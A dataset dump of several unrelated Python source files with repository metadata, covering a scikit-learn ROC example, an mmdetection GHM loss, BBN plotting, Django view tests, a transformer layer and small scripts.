import matplotlib as mpl
import seaborn as sns
sns.set()
import sklearn
from sklearn.datasets import load_breast_cancer
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import cross_val_score
cancer = load_breast_cancer()
x_train, x_test, y_train, y_test = train_test_split(cancer.data, cancer.target, test_size=0.5, random_state=66)
tree = DecisionTreeClassifier(criterion='entropy', max_depth=3, random_state=0)
scores = cross_val_score(tree, cancer.data, cancer.target, cv=5)
print('Cross validation scores: {}'.format(scores))
print('Cross validation scores: {:.3f}+-{:.3f}'.format(scores.mean(), scores.std()))
# AUC ROC
from sklearn.linear_model import LogisticRegression
model = LogisticRegression(random_state=0)
model.fit(x_train, y_train)
results = pd.DataFrame(model.predict_proba(X_test), columns=cancer.target_names)
results.head()
rates = {}
for threshold in np.linspace(0.01, 0.99, num=50):
labels = results['benign'].map(lambda x: 1 if x>threshold else 0)
m = confusion_matrix(y_test, labels)
rates[threshold] = {'false positive rate':m[0,1]/m[0,:].sum(), 'true positive rate':m[1,1]/m[1,:].sum()}
pd.DataFrame(rates).T.plot.scatter('false positive rate','true positive rate')
from sklearn import svm
from sklearn.metrics import ros_curve, auc
model = svm.SVC(kernel='linear', probability=True, random_state=0)
model.fit(x_train, y_train)
y_pred = model.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred)
auc = auc(fpr, tpr)
plt.plot(fpr, tpr, color='red', label='ROC curve (area=%.3f)'%auc)
plt.plot([0,1],[0,1],color='black', linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False positive rate')
plt.xlabel('True positive rate')
plt.title('Receiver operating characteristic')
plt.legend(loc="best")
plt.show()
|
[
"tamura.kosei905@mail.kyutech.jp"
] |
tamura.kosei905@mail.kyutech.jp
|
e86714e61dde836eeef750f7a800b133850db443
|
acad69f0abe162eea0cb13cbe15bfd88f6da08b4
|
/down-stream-tasks/mmdetection/mmdet/models/losses/ghm_loss.py
|
bc5eb774eab3c7515868c266182760c92061c911
|
[
"Apache-2.0"
] |
permissive
|
zhangzjn/EMO
|
69afcac53800d8b9a390f1214e178e2ca4da3b24
|
141afbdbce04683790f0699f256327ec420be442
|
refs/heads/main
| 2023-08-27T19:04:23.313676
| 2023-08-15T04:09:55
| 2023-08-15T04:09:55
| 584,987,542
| 139
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,136
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..builder import LOSSES
from .utils import weight_reduce_loss
def _expand_onehot_labels(labels, label_weights, label_channels):
bin_labels = labels.new_full((labels.size(0), label_channels), 0)
inds = torch.nonzero(
(labels >= 0) & (labels < label_channels), as_tuple=False).squeeze()
if inds.numel() > 0:
bin_labels[inds, labels[inds]] = 1
bin_label_weights = label_weights.view(-1, 1).expand(
label_weights.size(0), label_channels)
return bin_labels, bin_label_weights
# TODO: code refactoring to make it consistent with other losses
@LOSSES.register_module()
class GHMC(nn.Module):
"""GHM Classification Loss.
Details of the theorem can be viewed in the paper
`Gradient Harmonized Single-stage Detector
<https://arxiv.org/abs/1811.05181>`_.
Args:
bins (int): Number of the unit regions for distribution calculation.
momentum (float): The parameter for moving average.
use_sigmoid (bool): Can only be true for BCE based loss now.
loss_weight (float): The weight of the total GHM-C loss.
reduction (str): Options are "none", "mean" and "sum".
Defaults to "mean"
"""
def __init__(self,
bins=10,
momentum=0,
use_sigmoid=True,
loss_weight=1.0,
reduction='mean'):
super(GHMC, self).__init__()
self.bins = bins
self.momentum = momentum
edges = torch.arange(bins + 1).float() / bins
self.register_buffer('edges', edges)
self.edges[-1] += 1e-6
if momentum > 0:
acc_sum = torch.zeros(bins)
self.register_buffer('acc_sum', acc_sum)
self.use_sigmoid = use_sigmoid
if not self.use_sigmoid:
raise NotImplementedError
self.loss_weight = loss_weight
self.reduction = reduction
def forward(self,
pred,
target,
label_weight,
reduction_override=None,
**kwargs):
"""Calculate the GHM-C loss.
Args:
pred (float tensor of size [batch_num, class_num]):
The direct prediction of classification fc layer.
target (float tensor of size [batch_num, class_num]):
Binary class target for each sample.
label_weight (float tensor of size [batch_num, class_num]):
the value is 1 if the sample is valid and 0 if ignored.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Defaults to None.
Returns:
The gradient harmonized loss.
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
# the target should be binary class label
if pred.dim() != target.dim():
target, label_weight = _expand_onehot_labels(
target, label_weight, pred.size(-1))
target, label_weight = target.float(), label_weight.float()
edges = self.edges
mmt = self.momentum
weights = torch.zeros_like(pred)
# gradient length
g = torch.abs(pred.sigmoid().detach() - target)
valid = label_weight > 0
tot = max(valid.float().sum().item(), 1.0)
n = 0 # n valid bins
for i in range(self.bins):
inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
num_in_bin = inds.sum().item()
if num_in_bin > 0:
if mmt > 0:
self.acc_sum[i] = mmt * self.acc_sum[i] \
+ (1 - mmt) * num_in_bin
weights[inds] = tot / self.acc_sum[i]
else:
weights[inds] = tot / num_in_bin
n += 1
if n > 0:
weights = weights / n
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none')
loss = weight_reduce_loss(
loss, weights, reduction=reduction, avg_factor=tot)
return loss * self.loss_weight
# TODO: code refactoring to make it consistent with other losses
@LOSSES.register_module()
class GHMR(nn.Module):
"""GHM Regression Loss.
Details of the theorem can be viewed in the paper
`Gradient Harmonized Single-stage Detector
<https://arxiv.org/abs/1811.05181>`_.
Args:
mu (float): The parameter for the Authentic Smooth L1 loss.
bins (int): Number of the unit regions for distribution calculation.
momentum (float): The parameter for moving average.
loss_weight (float): The weight of the total GHM-R loss.
reduction (str): Options are "none", "mean" and "sum".
Defaults to "mean"
"""
def __init__(self,
mu=0.02,
bins=10,
momentum=0,
loss_weight=1.0,
reduction='mean'):
super(GHMR, self).__init__()
self.mu = mu
self.bins = bins
edges = torch.arange(bins + 1).float() / bins
self.register_buffer('edges', edges)
self.edges[-1] = 1e3
self.momentum = momentum
if momentum > 0:
acc_sum = torch.zeros(bins)
self.register_buffer('acc_sum', acc_sum)
self.loss_weight = loss_weight
self.reduction = reduction
# TODO: support reduction parameter
def forward(self,
pred,
target,
label_weight,
avg_factor=None,
reduction_override=None):
"""Calculate the GHM-R loss.
Args:
pred (float tensor of size [batch_num, 4 (* class_num)]):
The prediction of box regression layer. Channel number can be 4
or 4 * class_num depending on whether it is class-agnostic.
target (float tensor of size [batch_num, 4 (* class_num)]):
The target regression values with the same size of pred.
label_weight (float tensor of size [batch_num, 4 (* class_num)]):
The weight of each sample, 0 if ignored.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Defaults to None.
Returns:
The gradient harmonized loss.
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
mu = self.mu
edges = self.edges
mmt = self.momentum
# ASL1 loss
diff = pred - target
loss = torch.sqrt(diff * diff + mu * mu) - mu
# gradient length
g = torch.abs(diff / torch.sqrt(mu * mu + diff * diff)).detach()
weights = torch.zeros_like(g)
valid = label_weight > 0
tot = max(label_weight.float().sum().item(), 1.0)
n = 0 # n: valid bins
for i in range(self.bins):
inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
num_in_bin = inds.sum().item()
if num_in_bin > 0:
n += 1
if mmt > 0:
self.acc_sum[i] = mmt * self.acc_sum[i] \
+ (1 - mmt) * num_in_bin
weights[inds] = tot / self.acc_sum[i]
else:
weights[inds] = tot / num_in_bin
if n > 0:
weights /= n
loss = weight_reduce_loss(
loss, weights, reduction=reduction, avg_factor=tot)
return loss * self.loss_weight
|
[
"186368@zju.edu.cn"
] |
186368@zju.edu.cn
|
e7a6d17a22f5e9f8531f0d8e0c576cff70c8e1eb
|
3474fd7e1ccd8dd4e0b4da5c67d89694c69ce73c
|
/batch3/outputs/bbn_yhe.py
|
2d75b05e4272c8e13788d9378f35e7fd0e971249
|
[] |
no_license
|
mishakb/ISiTGR
|
149e1235ed2fff6ee2452b53c23dbe46f5dcf17e
|
db4f6fed47162de6347b62b3f8ae832e4ffbfdf0
|
refs/heads/master
| 2023-01-16T02:42:31.787483
| 2021-03-12T04:39:18
| 2021-03-12T04:39:18
| 176,977,260
| 27
| 7
| null | 2023-01-02T15:19:33
| 2019-03-21T15:48:31
|
HTML
|
UTF-8
|
Python
| false
| false
| 4,578
|
py
|
import planckStyle as s
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.insert(0, r'c:\work\dist\git\camb')
from camb.bbn import BBN_table_interpolator
BBNstandard = BBN_table_interpolator('PArthENoPE_880.2_standard.dat')
# BBN theoretical error
sigma_yp_theo = 0.0003
# resolution of the theoretical BBN curve (number of omega_b values)
num_ob = 50
# omegab range in the plot
ob_min = 0.019
ob_max = 0.025
# yhe range in the plot
yp_min = 0.175
yp_max = 0.28
# helium data: Aver et al. 2015
aver_mean = 0.2449
aver_sigma = 0.004
# helium data: Serenelli and Basu 2010
sere_minus = 0.294
sere_plus = yp_max
sere_b = np.zeros(2, dtype='float')
sere_y1 = np.zeros(2, dtype='float')
sere_y2 = np.zeros(2, dtype='float')
sere_b[0] = ob_min
sere_b[1] = ob_max
sere_y1[0] = sere_minus
sere_y1[1] = sere_minus
sere_y2[0] = sere_plus
sere_y2[1] = sere_plus
labels = [s.planckall, s.planckall + "+lensing+BAO"]
datatag = [s.defdata_all, s.defdata_all + '_lensing_BAO']
########### ombh2 -Yhe #############
g = s.getSinglePlotter()
colors = g.settings.solid_colors[3:0:-1]
del colors[1]
bbn_b = np.arange(ob_min, ob_max + 0.1, (ob_max - ob_min) / num_ob)
bbn_y = np.array([BBNstandard.Y_p(x, 0) for x in bbn_b])
bbn_y1 = bbn_y - sigma_yp_theo
bbn_y2 = bbn_y + sigma_yp_theo
g.add_y_bands(aver_mean, aver_sigma)
# plt.fill_between(sere_b, sere_y1, yp_max, alpha=0.07, color='gray')
# plt.plot(sere_b, sere_y1, alpha=0.2, color='gray', linestyle='-')
plt.text(0.0193, 0.249, "Aver et al. (2015)", fontsize=7.)
# plt.text(0.0183, 0.325, "Excluded by Serenelli \& Basu (2010)", fontsize=6.5)
bbn_y1 = bbn_y - 2 * sigma_yp_theo
bbn_y2 = bbn_y + 2 * sigma_yp_theo
plt.fill_between(bbn_b, bbn_y1, bbn_y2, alpha=0.4, color='green', lw=0, zorder=10)
bbn_y1 = bbn_y - sigma_yp_theo
bbn_y2 = bbn_y + sigma_yp_theo
plt.fill_between(bbn_b, bbn_y1, bbn_y2, alpha=0.9, color='green', lw=0, zorder=11)
# plt.plot(bbn_b, bbn_y1, color='green', linestyle='solid')
# plt.plot(bbn_b, bbn_y2, color='green', linestyle='solid')
roots = [g.getRoot('yhe', d) for d in datatag]
g.settings.legend_fontsize = 8
g.plot_2d(roots, 'omegabh2', 'YpBBN', filled=True, lims=[ob_min + 0.0001, ob_max, yp_min, yp_max])
g.add_legend(labels, legend_loc='lower left', colored_text=False)
# plt.gca().set_yticks([0.2, 0.25, 0.3])
plt.gca().annotate('Standard BBN',
xy=(0.0242, 0.249),
xycoords='data',
xytext=(-35, -30),
textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc3,rad=.2"),
fontsize=8.
)
g.export()
########### Neff -Yhe #############
g = s.getSinglePlotter()
N_min = 0.01
N_max = 5
Neff = np.arange(N_min, N_max + 0.1, 0.1)
Nrange = [N_min, N_max]
g.add_y_bands(aver_mean, aver_sigma)
plt.fill_between(Nrange, Neff[-1], sere_y1, alpha=0.07, color='gray')
plt.plot(Nrange, sere_y1, alpha=0.2, color='gray', linestyle='-')
plt.text(0.17, 0.242, "Aver et al. (2015)", fontsize=6)
plt.text(0.17, 0.337, "Excluded by Serenelli \& Basu (2010)", fontsize=6)
roots = [g.getRoot('nnu_yhe', d) for d in datatag]
# roots += ['base_nnu_yhe_' + s.defdata_all + '_Aver15']
g.plot_2d(roots, 'nnu', 'YpBBN', filled=True, lims=[0, N_max, yp_min, yp_max])
g.add_2d_contours('base_nnu_yhe_' + s.defdata_all + '_Aver15_post_BAO_lensing', 'nnu', 'YpBBN', filled=False)
ombh2mean = 0.0224
bbn_y = np.array([BBNstandard.Y_p(ombh2mean, x - 3.046) for x in Neff])
bbn_y1 = bbn_y - 2 * sigma_yp_theo
bbn_y2 = bbn_y + 2 * sigma_yp_theo
plt.fill_between(Neff, bbn_y1, bbn_y2, alpha=0.4, color='green', lw=0)
bbn_y1 = bbn_y - sigma_yp_theo
bbn_y2 = bbn_y + sigma_yp_theo
plt.fill_between(Neff, bbn_y1, bbn_y2, alpha=0.9, color='green', lw=0)
# plt.plot(Neff, bbn_y1, color='green', linestyle='solid')
# plt.plot(Neff, bbn_y2, color='green', linestyle='solid')
labels = labels[:1] + ['+lensing+BAO']
g.add_legend(labels, legend_loc='lower left', colored_text=True, fontsize=8)
g.add_x_marker(3.046)
plt.gca().set_yticks([0.15, 0.2, 0.25, 0.3, 0.35])
# g.rotate_yticklabels()
plt.gca().annotate('Standard BBN\n' + r'($\Omega_{\rm b} h^2=0.0224$)',
xy=(4.5, 0.262),
xycoords='data',
xytext=(-44, 30),
textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc3,rad=.2"),
fontsize=6.5
)
g.export(tag='neff')
|
[
"gqcristhian@utdallas.edu"
] |
gqcristhian@utdallas.edu
|
f7246f5b593196ab8c42ab3791fb27a636fa9877
|
2836c3caf8ca332635640a27254a345afd449081
|
/nws/FFE/dump_text.py
|
64ee6d4d5a352d51b778840d80848c276b2e4fec
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
akrherz/DEV
|
27cf1bac978a0d6bbfba1851b90d2495a3bdcd66
|
3b1ef5841b25365d9b256467e774f35c28866961
|
refs/heads/main
| 2023-08-30T10:02:52.750739
| 2023-08-29T03:08:01
| 2023-08-29T03:08:01
| 65,409,757
| 2
| 0
|
MIT
| 2023-09-12T03:06:07
| 2016-08-10T19:16:28
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,179
|
py
|
"""Dump text from database."""
from pyiem.util import get_dbconn
def main():
"""Go Main Go."""
pgconn = get_dbconn("postgis")
cursor = pgconn.cursor()
cursor.execute(
"WITH data as ("
"SELECT wfo, eventid, issue at time zone 'UTC' as issue, report, "
"expire at time zone 'UTC' as expire, "
"svs, row_number() OVER (PARTITION by wfo, eventid, "
"extract(year from issue) ORDER by length(svs) DESC) from "
"warnings where phenomena = 'FF' and significance = 'W' and "
"is_emergency) "
"SELECT * from data WHERE row_number = 1 ORDER by issue, wfo, eventid"
)
done = []
for row in cursor:
key = f"{row[0]}_{row[1]}_{row[2].year}"
if key in done:
continue
done.append(key)
i = 0
with open(f"FFE_Text/{key}_{i}.txt", "w") as fh:
fh.write(row[3])
for prod in ("" if row[5] is None else row[5]).split("__"):
if prod.strip() == "":
continue
i += 1
with open(f"FFE_Text/{key}_{i}.txt", "w") as fh:
fh.write(prod)
if __name__ == "__main__":
main()
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
cf173c4188039fb9f7c03d8041bab18213f9fedf
|
2dd0082221239fef0e0894c852f70f1eaeb62b9e
|
/Assignments/pete/python/lab12/lab12-guess_the_number-v5.py
|
2c9c150c8bd62d806effabdefe672c22f7b08fbf
|
[] |
no_license
|
pjz987/2019-10-28-fullstack-night
|
03097cf3dc24aeec0c326044bb0fc99385fbc333
|
4c643013de73f08d7503d62ec602d6a5c80ffa7e
|
refs/heads/master
| 2022-11-11T19:40:00.296645
| 2020-06-25T16:14:47
| 2020-06-25T16:14:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
'''
lab12-guess_the_number-v5.py
V5
Swap the user with the computer: the user will pick a number, and the computer will make random guesses until they get it right.
'''
import random
import time
user_num = int(input("Welcome to Guess the Number v5.\nIn this program, computer guess you!\nPlease enter a number between 1 and 10: "))
while True:
if user_num not in list(range(1, 11)):
user_num = int(input(f"No cheating computer now. {user_num} is not a number between 1 and 10. Please enter a new number: "))
else:
break
guesses = []
count = 0
while True:
time.sleep(1)
guess = random.randint(1, 10)
if guess == user_num:
print(f"Computer guessed your number {user_num}.\n")
time.sleep(1)
while True:
print("CONGRATULATION: COMPUTER GUESS YOU!" * count)
count = count + 1
time.sleep(.25)
else:
if guess in guesses:
print(f"Computer guess {guess} again. Computer can never be too sure.")
else:
print(f"Computer guessed {guess}. Computer wrong. Computer try again.")
guesses.append(guess)
|
[
"pwj2012@gmail.com"
] |
pwj2012@gmail.com
|
ecad71b97f40fd1c4027e616ed6efc3e283cbe34
|
2442d073434d463cede4a79ae8f9fd31c62174f8
|
/object-oriented-programming/composition/address.py
|
fec0ad8bea031d381431f42455a4d6f1d84773c9
|
[] |
no_license
|
grbalmeida/hello-python
|
3630d75cfdde15223dc1c3a714fd562f6cda0505
|
4d9ddf2f7d104fdbc3aed2c88e50af19a39c1b63
|
refs/heads/master
| 2020-07-10T10:04:38.982256
| 2020-02-26T00:37:36
| 2020-02-26T00:37:36
| 204,237,527
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
class Address:
def __init__(self, city, state):
self.city = city
self.state = state
def __del__(self):
print(f'{self.city}/{self.state} have been deleted')
|
[
"g.r.almeida@live.com"
] |
g.r.almeida@live.com
|
3fc82b879ed14d4f2cb2742b09238700a3f0c64f
|
54e23ae20b7351f1e5db325b13cc9a106b3e581a
|
/transformer/layers.py
|
723c431493e82ba286dc994ed9bec9d9c528fbf9
|
[
"Apache-2.0"
] |
permissive
|
okehkim/End-to-End-Speech-Recognition-Models
|
191755c7fdab23ad61280279e200c9757824c64b
|
7b4695bbc778e4d2c92470b56e2479c8d81d0079
|
refs/heads/main
| 2023-01-30T02:11:57.860303
| 2020-11-28T16:53:02
| 2020-11-28T16:53:02
| 316,779,547
| 0
| 0
|
Apache-2.0
| 2020-11-28T16:52:27
| 2020-11-28T16:52:27
| null |
UTF-8
|
Python
| false
| false
| 4,293
|
py
|
# -*- coding: utf-8 -*-
# Soohwan Kim @ https://github.com/sooftware/
# This source code is licensed under the Apache 2.0 License license found in the
# LICENSE file in the root directory of this source tree.
import torch.nn as nn
from torch import Tensor
from typing import Tuple, Optional, Any
from transformer.sublayers import AddNorm, PositionWiseFeedForwardNet
from attention import MultiHeadAttention
class SpeechTransformerEncoderLayer(nn.Module):
"""
EncoderLayer is made up of self-attention and feedforward network.
This standard encoder layer is based on the paper "Attention Is All You Need".
Args:
d_model: dimension of model (default: 512)
num_heads: number of attention heads (default: 8)
d_ff: dimension of feed forward network (default: 2048)
dropout_p: probability of dropout (default: 0.3)
ffnet_style: style of feed forward network [ff, conv] (default: ff)
"""
def __init__(
self,
d_model: int = 512, # dimension of model
num_heads: int = 8, # number of attention heads
d_ff: int = 2048, # dimension of feed forward network
dropout_p: float = 0.3, # probability of dropout
ffnet_style: str = 'ff' # style of feed forward network
) -> None:
super(SpeechTransformerEncoderLayer, self).__init__()
self.self_attention = AddNorm(MultiHeadAttention(d_model, num_heads), d_model)
self.feed_forward = AddNorm(PositionWiseFeedForwardNet(d_model, d_ff, dropout_p, ffnet_style), d_model)
def forward(
self,
inputs: Tensor, # B x T_input x D
non_pad_mask: Optional[Any] = None, # B x T_input
self_attn_mask: Optional[Any] = None # B x T_input x T_output
) -> Tuple[Tensor, Tensor]:
output, attn = self.self_attention(inputs, inputs, inputs, self_attn_mask)
output *= non_pad_mask
output = self.feed_forward(output)
output *= non_pad_mask
return output, attn
class SpeechTransformerDecoderLayer(nn.Module):
"""
DecoderLayer is made up of self-attention, multi-head attention and feedforward network.
This standard decoder layer is based on the paper "Attention Is All You Need".
Args:
d_model: dimension of model (default: 512)
num_heads: number of attention heads (default: 8)
d_ff: dimension of feed forward network (default: 2048)
dropout_p: probability of dropout (default: 0.3)
ffnet_style: style of feed forward network [ff, conv] (default: ff)
"""
def __init__(
self,
d_model: int = 512, # dimension of model
num_heads: int = 8, # number of attention heads
d_ff: int = 2048, # dimension of feed forward network
dropout_p: float = 0.3, # probability of dropout
ffnet_style: str = 'ff' # style of feed forward network
) -> None:
super(SpeechTransformerDecoderLayer, self).__init__()
self.self_attention = AddNorm(MultiHeadAttention(d_model, num_heads), d_model)
self.memory_attention = AddNorm(MultiHeadAttention(d_model, num_heads), d_model)
self.feed_forward = AddNorm(PositionWiseFeedForwardNet(d_model, d_ff, dropout_p, ffnet_style), d_model)
def forward(
self,
inputs: Tensor, # B x T_input
memory: Tensor, # B x T_input x D_model
non_pad_mask: Optional[Any] = None, # B x T_input
self_attn_mask: Optional[Any] = None, # B x T_input x T_input
memory_mask: Optional[Any] = None # B x T_input x T_output
) -> Tuple[Tensor, Tensor, Tensor]:
output, self_attn = self.self_attention(inputs, inputs, inputs, self_attn_mask)
output *= non_pad_mask
output, memory_attn = self.memory_attention(output, memory, memory, memory_mask)
output *= non_pad_mask
output = self.feed_forward(output)
output *= non_pad_mask
return output, self_attn, memory_attn
|
[
"sh951011@gmail.com"
] |
sh951011@gmail.com
|
232acacec4a343733eb00b2811848b81ae867e9f
|
e3c8f786d09e311d6ea1cab50edde040bf1ea988
|
/Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/ip/test_ip_views.py
|
099cf7ffc43e424cec6cb803e502f9a1d4a4f205
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
foss2cyber/Incident-Playbook
|
d1add8aec6e28a19e515754c6ce2e524d67f368e
|
a379a134c0c5af14df4ed2afa066c1626506b754
|
refs/heads/main
| 2023-06-07T09:16:27.876561
| 2021-07-07T03:48:54
| 2021-07-07T03:48:54
| 384,988,036
| 1
| 0
|
MIT
| 2021-07-11T15:45:31
| 2021-07-11T15:45:31
| null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Ip
import urllib.parse
class IpViewTestCase(TestCase):
""" ip view tests """
@classmethod
def setUpTestData(cls):
# create object
Ip.objects.create(ip_ip='127.0.0.1')
# create user
User.objects.create_user(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
def test_ip_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/ip/', safe='')
# get response
response = self.client.get('/ip/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_ip_list_logged_in(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/')
# compare
self.assertEqual(response.status_code, 200)
def test_ip_list_template(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/ip/ip_list.html')
def test_ip_list_get_user_context(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_ip')
def test_ip_list_redirect(self):
""" test list view """
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# create url
destination = urllib.parse.quote('/ip/', safe='/')
# get response
response = self.client.get('/ip', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_ip_detail_not_logged_in(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/ip/' + str(ip_1.ip_id) + '/', safe='')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_ip_detail_logged_in(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_ip_detail_template(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/ip/ip_detail.html')
def test_ip_detail_get_user_context(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_ip')
def test_ip_detail_redirect(self):
""" test detail view """
# get object
ip_1 = Ip.objects.get(ip_ip='127.0.0.1')
# login testuser
self.client.login(username='testuser_ip', password='pRs9Ap7oc9W0yjLfnP2Y')
# create url
destination = urllib.parse.quote('/ip/' + str(ip_1.ip_id) + '/', safe='/')
# get response
response = self.client.get('/ip/' + str(ip_1.ip_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
|
[
"a.songer@protonmail.com"
] |
a.songer@protonmail.com
|
1bb2970dbed9a9c8f76d2ed9a6d205330e6218ef
|
b3858bf912bcdeb6fdf23646d94d2b9cd6e7900a
|
/Candy Race.py
|
63c7d4b1575660a3662429db52355fb201d39a0d
|
[] |
no_license
|
Programmer-Admin/binarysearch-editorials
|
eedf9e253e85324030260d44e798b0ca13645e63
|
12815fe3803cf5392ccfaadd38c7f50e882275c1
|
refs/heads/main
| 2023-02-06T04:59:25.279318
| 2020-12-26T20:45:34
| 2020-12-26T20:45:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
"""
Candy Race
Apparently you can solve this in 1ms, but here's a memoized recursive solution for your soul.
"""
from functools import lru_cache
class Solution:
def solve(self, candies):
@lru_cache(None)
def dfs(i,j):
if j<i: return 0
return max(candies[i]-dfs(i+1, j), candies[j]-dfs(i,j-1))
return dfs(0, len(candies)-1)>0
|
[
"jimenez.adam0@gmail.com"
] |
jimenez.adam0@gmail.com
|
6eab525395ba4dccbc34669ccc2adea80f44a930
|
98e821fe72b711b5d05dbaa7018541a643950291
|
/edrnsite/collaborations/browser/groupspace.py
|
ef62ca89f22e62fa55a445b1d324247c5276f794
|
[
"Apache-2.0"
] |
permissive
|
EDRN/edrnsite.collaborations
|
e6b0a71a13a6171b9e48de3b8b39979ebb969504
|
2344b3fe2f60e1079823c688968329010d3c67d5
|
refs/heads/master
| 2021-01-18T21:09:51.188644
| 2018-09-05T14:58:42
| 2018-09-05T14:58:42
| 20,818,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# encoding: utf-8
# Copyright 2012 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
'''EDRN Site Collaborations: group space view
'''
from Products.Five.browser import BrowserView
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
class GroupSpaceView(BrowserView):
'''Default view for a Group Space.'''
index = ViewPageTemplateFile('templates/groupspace.pt')
|
[
"sean.c.kelly@me.com"
] |
sean.c.kelly@me.com
|
dbd85ec4828daa9922789e8a37df4ddb2a4a6b71
|
e0f4db1f56bce425a1fe53796461b4b77f9f8c72
|
/src/profiles/migrations/0002_auto_20180820_1928.py
|
bba3be33fd8426a98ccba6dbec71351398b86fac
|
[] |
no_license
|
AhmedBafadal/My-Picks
|
a105feacb8d649ce10cee71d6c4308360e221d94
|
21a9143119f9933dcebd53c2fd252a2160ab0e58
|
refs/heads/master
| 2020-03-26T09:50:05.059463
| 2018-08-29T18:54:17
| 2018-08-29T18:54:17
| 144,767,334
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 756
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-08-20 18:28
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='followers',
field=models.ManyToManyField(blank=True, related_name='is_follower', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='profile',
name='following',
field=models.ManyToManyField(blank=True, related_name='is_following', to=settings.AUTH_USER_MODEL),
),
]
|
[
"a.m.bafadal@gmail.com"
] |
a.m.bafadal@gmail.com
|
554020e53113b860b8d0bbd5c0664b43fa6ae211
|
42a7b34bce1d2968079c6ea034d4e3f7bb5802ad
|
/ex51/gothonweb/bin/app.py
|
4cbf3709fa4bf1a85bea1cd83292927e281bb187
|
[] |
no_license
|
linpan/LPTHW
|
45c9f11265b5e1ffe0387a56cec192fa12c6c4d5
|
227bfee3098e8ecb5f07ffc3a0b8e64a853106ce
|
refs/heads/master
| 2021-04-26T13:42:56.859644
| 2014-12-18T15:21:14
| 2014-12-18T15:21:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
#! /usr/bin/env python
#coding:utf-8
import web
urls = (
'/hello','Index'
)
app = web.application(urls,globals())
render = web.template.render('/usr/local/LPTHW/ex51/gothonweb/templates/',base="layout")
class Index(object):
def GET(self):
return render.hello_form()
def POST(self):
form = web.input(name="Nobody",greet="Hello")
greeting = "%s,%s" % (form.greet,form.name)
return render.index(greeting = greeting)
if __name__ == '__main__':
app.run()
|
[
"shine_forever@yeah.net"
] |
shine_forever@yeah.net
|
